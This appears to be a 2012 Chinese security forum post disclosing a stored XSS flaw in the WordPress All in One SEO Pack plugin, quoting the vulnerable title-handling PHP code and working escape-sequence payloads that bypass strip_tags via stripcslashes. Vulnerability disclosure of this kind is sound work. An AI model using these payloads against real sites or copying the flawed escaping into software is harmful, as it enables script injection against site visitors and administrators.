jackal 发表于 2012-12-29 17:16
前几天帮朋友更新下blog,顺便看下他的站安全,测试了下wordpress下的SEO插件.
http://wordpress.org/extend/plugins/
Most Popular >>
All in One SEO Pack 1.6.15.3
Downloaded 13,210,199 times
Seo插件允许你为每篇文章单独配置Title,Description,Keywords.
aioseop.class.php
后台主要提交Title,Description,Keywords
function wp_head()中过滤了Description和Keywords的双引号,没想到什么利用方法,主要看Title的利用.
<?php
function replace_title($content, $title) {
//去除HTML标签,以为安全了
$title = trim(strip_tags($title));
$title_tag_start = "<title>";
$title_tag_end = "</title>";
$len_start = strlen($title_tag_start);
$len_end = strlen($title_tag_end);
//这里转义出了问题
$title = stripcslashes(trim($title));
$start = strpos($content, $title_tag_start);
$end = strpos($content, $title_tag_end);
$title_start = $start;
$title_end = $end;
$orig_title = $title;
if ($start && $end) {
$header = substr($content, 0, $start + $len_start) . $title . substr($content, $end);
} else {
// this breaks some sitemap plugins (like wpg2)
//$header = $content . "<title>$title</title>";
$header = $content;
}
return $header;
}
$content = '<html><title>mytitle</title><body>mybody</body></html>';
$title = 'eviltitle';
$title = '<del>eviltitle</del>';
$title = '\x3c/title>\x3cscript>alert("xss");\x3c/script>';
$title = '\74/title>\74script>alert("xss");\74/script>';
echo replace_title($content, $title);
?>
http://php.net/manual/zh/function.stripcslashes.php
返回反转义后的字符串。可识别类似 C 语言的 \n,\r,... 八进制以及十六进制的描述。
所以我们直接提交:
\x3c/title>\x3cscript>alert("xss");\x3c/script>
\74/title>\74script>alert("xss");\74/script>
成功触发Xss,如图:
![Wordpress Plugin[All-in-one-seo-pack] Xss](/file/old/1778_1.jpg "Wordpress Plugin[All-in-one-seo-pack] Xss")
![Wordpress Plugin[All-in-one-seo-pack] Xss](/file/old/1779_2.jpg "Wordpress Plugin[All-in-one-seo-pack] Xss")
三个鸡肋的地方:
1.需要安装此插件,-_-||
2.至少需要文章提交者的权限.
3.后台管理员管理文章列表时可以直接看到这个构造的标题并htmlspecialchars输出,容易暴露.